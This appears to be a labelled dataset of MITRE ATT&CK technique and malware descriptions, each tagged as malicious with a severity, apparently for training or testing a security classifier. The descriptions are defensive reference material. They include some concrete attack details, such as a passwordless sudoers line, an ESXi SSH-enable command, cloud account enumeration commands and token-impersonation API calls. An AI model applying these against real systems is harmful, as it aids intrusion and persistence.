{"id": "mitre_00528", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Modify Authentication Process\n\nTechnique: T1556\nTactics: credential-access, defense-evasion, persistence\nPlatforms: Windows, Linux, macOS, Network Devices, IaaS, SaaS, Office Suite, Identity Provider\n\nAdversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).\n\nAdversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1556", "technique_name": "Modify Authentication Process", "tactics": ["credential-access", "defense-evasion", "persistence"]}}]}
{"id": "mitre_00529", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Internet Connection Discovery\n\nTechnique: T1016.001\nTactics: discovery\nPlatforms: Windows, Linux, macOS, ESXi\n\nAdversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert, and GET requests to websites, or performing initial speed testing to confirm bandwidth.\n\nAdversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1016.001", "technique_name": "Internet Connection Discovery", "tactics": ["discovery"]}}]}
{"id": "mitre_00530", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# hcdLoader\n\nType: malware\nPlatforms: Windows\n\n[hcdLoader](https://attack.mitre.org/software/S0071) is a remote access tool (RAT) that has been used by [APT18](https://attack.mitre.org/groups/G0026). (Citation: Dell Lateral Movement)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "hcdLoader", "malware_type": "malware"}}]}
{"id": "mitre_00531", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Sudo\n\nTechnique: T1169\nTactics: privilege-escalation\nPlatforms: Linux, macOS\n\nThe sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the idea of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL (Citation: OSX.Dok Malware). \n\nAdversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. You must have elevated privileges to edit this file though.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1169", "technique_name": "Sudo", "tactics": ["privilege-escalation"]}}]}
{"id": "mitre_00532", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# PACEMAKER\n\nType: malware\nPlatforms: Network Devices, Linux\n\n[PACEMAKER](https://attack.mitre.org/software/S1109) is a credential stealer that was used by [APT5](https://attack.mitre.org/groups/G1023) as early as 2020 including activity against US Defense Industrial Base (DIB) companies.(Citation: Mandiant Pulse Secure Zero-Day April 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "PACEMAKER", "malware_type": "malware"}}]}
{"id": "mitre_00533", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# POSHSPY\n\nType: malware\nPlatforms: Windows\n\n[POSHSPY](https://attack.mitre.org/software/S0150) is a backdoor that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2015. It appears to be used as a secondary backdoor used if the actors lost access to their primary backdoors. (Citation: FireEye POSHSPY April 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "POSHSPY", "malware_type": "malware"}}]}
{"id": "mitre_00534", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Hikit\n\nType: malware\nPlatforms: Windows\n\n[Hikit](https://attack.mitre.org/software/S0009) is malware that has been used by [Axiom](https://attack.mitre.org/groups/G0001) for late-stage persistence and exfiltration after the initial compromise.(Citation: Novetta-Axiom)(Citation: FireEye Hikit Rootkit)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Hikit", "malware_type": "malware"}}]}
{"id": "mitre_00535", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Token Impersonation/Theft\n\nTechnique: T1134.001\nTactics: defense-evasion, privilege-escalation\nPlatforms: Windows\n\nAdversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`.(Citation: DuplicateToken function) The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread.\n\nAn adversary may perform [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system.\n\nWhen an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://attack.mitre.org/techniques/T1134/002) using `CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) is also distinct from [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) in that it refers to duplicating an existing token, rather than creating a new one.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1134.001", "technique_name": "Token Impersonation/Theft", "tactics": ["defense-evasion", "privilege-escalation"]}}]}
{"id": "mitre_00536", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# xCmd\n\nType: tool\n\n[xCmd](https://attack.mitre.org/software/S0123) is an open source tool that is similar to [PsExec](https://attack.mitre.org/software/S0029) and allows the user to execute applications on remote systems. (Citation: xCmd)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "xCmd", "malware_type": "tool"}}]}
{"id": "mitre_00537", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Cloud Account\n\nTechnique: T1087.004\nTactics: discovery\nPlatforms: IaaS, Identity Provider, Office Suite, SaaS\n\nAdversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.\n\nWith authenticated access there are several tools that can be used to find accounts. The Get-MsolRoleMember PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command az ad user list will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) \n\nThe AWS command aws iam list-users may be used to obtain a list of users in the current account while aws iam list-roles can obtain IAM roles that have a specified path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In GCP, gcloud iam service-accounts list and gcloud projects get-iam-policy may be used to obtain a listing of service accounts and users in a project.(Citation: Google Cloud - IAM Servie Accounts List API)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1087.004", "technique_name": "Cloud Account", "tactics": ["discovery"]}}]}
{"id": "mitre_00538", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Software Deployment Tools\n\nTechnique: T1072\nTactics: execution, lateral-movement\nPlatforms: Linux, macOS, Network Devices, SaaS, Windows\n\nAdversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network. Configuration management and software deployment applications may be used in an enterprise network or cloud environment for routine administration purposes. These systems may also be integrated into CI/CD pipelines. Examples of such solutions include: SCCM, HBSS, Altiris, AWS Systems Manager, Microsoft Intune, Azure Arc, and GCP Deployment Manager. \n\nAccess to network-wide or enterprise-wide endpoint management software may enable an adversary to achieve remote code execution on all connected systems. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.\n\nSaaS-based configuration management services may allow for broad [Cloud Administration Command](https://attack.mitre.org/techniques/T1651) on cloud-hosted instances, as well as the execution of arbitrary commands on on-premises endpoints. For example, Microsoft Configuration Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001) to communicate back to adversary owned infrastructure.(Citation: Mitiga Security Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices may also have configuration management tools that can be similarly abused by adversaries.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)\n\nThe permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to access specific functionality.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1072", "technique_name": "Software Deployment Tools", "tactics": ["execution", "lateral-movement"]}}]}
{"id": "mitre_00539", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# InvisiMole\n\nType: malware\nPlatforms: Windows\n\n[InvisiMole](https://attack.mitre.org/software/S0260) is a modular spyware program that has been used by the InvisiMole Group since at least 2013. [InvisiMole](https://attack.mitre.org/software/S0260) has two backdoor modules called RC2FM and RC2CL that are used to perform post-exploitation activities. It has been discovered on compromised victims in the Ukraine and Russia. [Gamaredon Group](https://attack.mitre.org/groups/G0047) infrastructure has been used to download and execute [InvisiMole](https://attack.mitre.org/software/S0260) against a small number of victims.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "InvisiMole", "malware_type": "malware"}}]}
{"id": "mitre_00540", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Gootloader\n\nType: malware\nPlatforms: Windows\n\n[Gootloader](https://attack.mitre.org/software/S1138) is a Javascript-based infection framework that has been used since at least 2020 as a delivery method for the Gootkit banking trojan, [Cobalt Strike](https://attack.mitre.org/software/S0154), [REvil](https://attack.mitre.org/software/S0496), and others. [Gootloader](https://attack.mitre.org/software/S1138) operates on an \"Initial Access as a Service\" model and has leveraged [SEO Poisoning](https://attack.mitre.org/techniques/T1608/006) to provide access to entities in multiple sectors worldwide including financial, military, automotive, pharmaceutical, and energy.(Citation: Sophos Gootloader)(Citation: SentinelOne Gootloader June 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Gootloader", "malware_type": "malware"}}]}
{"id": "mitre_00541", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# PoshC2\n\nType: tool\nPlatforms: Windows, Linux, macOS\n\n[PoshC2](https://attack.mitre.org/software/S0378) is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in [PowerShell](https://attack.mitre.org/techniques/T1059/001). Although [PoshC2](https://attack.mitre.org/software/S0378) is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.(Citation: GitHub PoshC2)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "PoshC2", "malware_type": "tool"}}]}
{"id": "mitre_00542", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Impersonation\n\nTechnique: T1656\nTactics: defense-evasion\nPlatforms: Linux, macOS, Office Suite, SaaS, Windows\n\nAdversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary\u2019s ultimate goals, possibly against multiple victims. \n \nIn many cases of business email compromise or email fraud campaigns, adversaries use impersonation to defraud victims -- deceiving them into sending money or divulging information that ultimately enables [Financial Theft](https://attack.mitre.org/techniques/T1657).\n\nAdversaries will often also use social engineering techniques such as manipulative and persuasive language in email subject lines and body text such as `payment`, `request`, or `urgent` to push the victim to act quickly before malicious activity is detected. These campaigns are often specifically targeted against people who, due to job roles and/or accesses, can carry out the adversary\u2019s goal.\u202f\u202f \n \nImpersonation is typically preceded by reconnaissance techniques such as [Gather Victim Identity Information](https://attack.mitre.org/techniques/T1589) and [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591) as well as acquiring infrastructure such as email domains (i.e. [Domains](https://attack.mitre.org/techniques/T1583/001)) to substantiate their false identity.(Citation: CrowdStrike-BEC)\n \nThere is the potential for multiple victims in campaigns involving impersonation. For example, an adversary may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) targeting one organization which can then be used to support impersonation against other entities.(Citation: VEC)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1656", "technique_name": "Impersonation", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00543", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Azorult\n\nType: malware\nPlatforms: Windows\n\n[Azorult](https://attack.mitre.org/software/S0344) is a commercial Trojan that is used to steal information from compromised hosts. [Azorult](https://attack.mitre.org/software/S0344) has been observed in the wild as early as 2016.\nIn July 2018, [Azorult](https://attack.mitre.org/software/S0344) was seen used in a spearphishing campaign against targets in North America. [Azorult](https://attack.mitre.org/software/S0344) has been seen used for cryptocurrency theft. (Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Azorult", "malware_type": "malware"}}]}
{"id": "mitre_00544", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SSH\n\nTechnique: T1021.004\nTactics: lateral-movement\nPlatforms: ESXi, Linux, macOS\n\nAdversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.\n\nSSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. On ESXi, SSH can be enabled either directly on the host (e.g., via `vim-cmd hostsvc/enable_ssh`) or via vCenter.(Citation: Sygnia ESXi Ransomware 2025)(Citation: TrendMicro ESXI Ransomware)(Citation: Sygnia Abyss Locker 2025) The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user\u2019s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user (i.e., [SSH Authorized Keys](https://attack.mitre.org/techniques/T1098/004)).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1021.004", "technique_name": "SSH", "tactics": ["lateral-movement"]}}]}
{"id": "mitre_00545", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SplatCloak\n\nType: malware\nPlatforms: Windows\n\n[SplatCloak](https://attack.mitre.org/software/S1234) is a malware that disables EDR-related routines used by Windows Defender and Kaspersky to aid in evading detection. [SplatCloak](https://attack.mitre.org/software/S1234) has been deployed by [SplatDropper](https://attack.mitre.org/software/S1232) and is known to be leveraged by [Mustang Panda](https://attack.mitre.org/groups/G0129) since 2025.(Citation: Zscaler PAKLOG CorkLog SplatCloak Splatdropper April 2025)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "SplatCloak", "malware_type": "malware"}}]}
{"id": "mitre_00546", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Conficker\n\nType: malware\nPlatforms: Windows\n\n[Conficker](https://attack.mitre.org/software/S0608) is a computer worm first detected in October 2008 that targeted Microsoft Windows using the MS08-067 Windows vulnerability to spread.(Citation: SANS Conficker) In 2016, a variant of [Conficker](https://attack.mitre.org/software/S0608) made its way on computers and removable disk drives belonging to a nuclear power plant.(Citation: Conficker Nuclear Power Plant)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Conficker", "malware_type": "malware"}}]}
{"id": "mitre_00547", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Re-opened Applications\n\nTechnique: T1547.007\nTactics: persistence, privilege-escalation\nPlatforms: macOS\n\nAdversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to \"Reopen windows when logging back in\".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist within the ~/Library/Preferences/ByHost directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user\u2019s next logon.\n\nAdversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist file to execute payloads when a user logs in.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1547.007", "technique_name": "Re-opened Applications", "tactics": ["persistence", "privilege-escalation"]}}]}
{"id": "mitre_00548", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Web Session Cookie\n\nTechnique: T1550.004\nTactics: defense-evasion, lateral-movement\nPlatforms: SaaS, IaaS, Office Suite\n\nAdversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)\n\nAuthentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.\n\nThere have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1550.004", "technique_name": "Web Session Cookie", "tactics": ["defense-evasion", "lateral-movement"]}}]}
{"id": "mitre_00549", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SNMP (MIB Dump)\n\nTechnique: T1602.001\nTactics: collection\nPlatforms: Network Devices\n\nAdversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).\n\nThe MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages(Citation: SANS Information Security Reading Room Securing SNMP Securing SNMP). The MIB may also contain device operational information, including running configuration, routing table, and interface details.\n\nAdversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1602.001", "technique_name": "SNMP (MIB Dump)", "tactics": ["collection"]}}]}
{"id": "mitre_00550", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Virtual Private Server\n\nTechnique: T1583.003\nTactics: resource-development\nPlatforms: PRE\n\nAdversaries may rent Virtual Private Servers (VPSs)\u00a0that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.\n\nAcquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1583.003", "technique_name": "Virtual Private Server", "tactics": ["resource-development"]}}]}
{"id": "mitre_00551", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Systemd Service\n\nTechnique: T1543.002\nTactics: persistence, privilege-escalation\nPlatforms: Linux\n\nAdversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible. \n\nSystemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`).(Citation: lambert systemd 2022) \n\nInside the `.service` unit files, the following directives are used to execute commands:(Citation: freedesktop systemd.service) \n\n* `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives execute when a service is started manually by `systemctl` or on system start if the service is set to automatically start.\n* `ExecReload` directive executes when a service restarts. \n* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives execute when a service is stopped. \n\nAdversaries have created new service files, altered the commands a `.service` file\u2019s directive executes, and modified the user directive a `.service` file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.(Citation: Anomali Rocke March 2019)(Citation: airwalk backdoor unix systems)(Citation: Rapid7 Service Persistence 22JUNE2016) \n\nThe `.service` file\u2019s User directive can be used to run service as a specific user, which could result in privilege escalation based on specific user/group permissions. \n\nSystemd services can be created via systemd generators, which support the dynamic generation of unit files. Systemd generators are small executables that run during boot or configuration reloads to dynamically create or modify systemd unit files by converting non-native configurations into services, symlinks, or drop-ins (i.e., [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037)).(Citation: Elastic Security Labs Linux Persistence 2024)(Citation: Pepe Berba Systemd 2022)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1543.002", "technique_name": "Systemd Service", "tactics": ["persistence", "privilege-escalation"]}}]}
{"id": "mitre_00552", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Disco\n\nType: malware\nPlatforms: Windows\n\n[Disco](https://attack.mitre.org/software/S1088) is a custom implant that has been used by [MoustachedBouncer](https://attack.mitre.org/groups/G1019) since at least 2020 including in campaigns using targeted malicious content injection for initial access and command and control.(Citation: MoustachedBouncer ESET August 2023)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Disco", "malware_type": "malware"}}]}
{"id": "mitre_00553", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Spearphishing Attachment\n\nTechnique: T1566.001\nTactics: initial-access\nPlatforms: Linux, macOS, Windows\n\nAdversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.(Citation: Unit 42 DarkHydrus July 2018) Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1566.001", "technique_name": "Spearphishing Attachment", "tactics": ["initial-access"]}}]}
{"id": "mitre_00554", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# cd00r\n\nType: malware\nPlatforms: Network Devices\n\n[cd00r](https://attack.mitre.org/software/S1204) is an open-source backdoor for UNIX and UNIX-variant operating systems that was orginally released in 2000. [cd00r](https://attack.mitre.org/software/S1204) source code is primarily based on a packet-capturing program as it utilizes a sniffer to listen for specific sequences of network traffic or \"secret knock\" before executing the attacker's code.(Citation: Hartrell cd00r 2002)(Citation: Lumen J-Magic JAN 2025)\n\n", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "cd00r", "malware_type": "malware"}}]}
{"id": "mitre_00555", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Junk Data\n\nTechnique: T1001.001\nTactics: command-and-control\nPlatforms: ESXi, Linux, macOS, Windows\n\nAdversaries may add junk data to protocols used for command and control to make detection more difficult.(Citation: FireEye SUNBURST Backdoor December 2020) By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters. ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1001.001", "technique_name": "Junk Data", "tactics": ["command-and-control"]}}]}
{"id": "mitre_00556", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# OilCheck\n\nType: malware\nPlatforms: Windows\n\n[OilCheck](https://attack.mitre.org/software/S1171) is a C#/.NET downloader that has been used by [OilRig](https://attack.mitre.org/groups/G0049) since at least 2022 including against targets in Israel. [OilCheck](https://attack.mitre.org/software/S1171) uses draft messages created in a shared email account for C2 communication.(Citation: ESET OilRig Downloaders DEC 2023)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "OilCheck", "malware_type": "malware"}}]}
{"id": "mitre_00557", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Parent PID Spoofing\n\nTechnique: T1134.004\nTactics: defense-evasion, privilege-escalation\nPlatforms: Windows\n\nAdversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)\n\nAdversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)\n\nExplicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1134.004", "technique_name": "Parent PID Spoofing", "tactics": ["defense-evasion", "privilege-escalation"]}}]}
{"id": "mitre_00558", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# DealersChoice\n\nType: malware\nPlatforms: Windows\n\n[DealersChoice](https://attack.mitre.org/software/S0243) is a Flash exploitation framework used by [APT28](https://attack.mitre.org/groups/G0007). (Citation: Sofacy DealersChoice)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "DealersChoice", "malware_type": "malware"}}]}
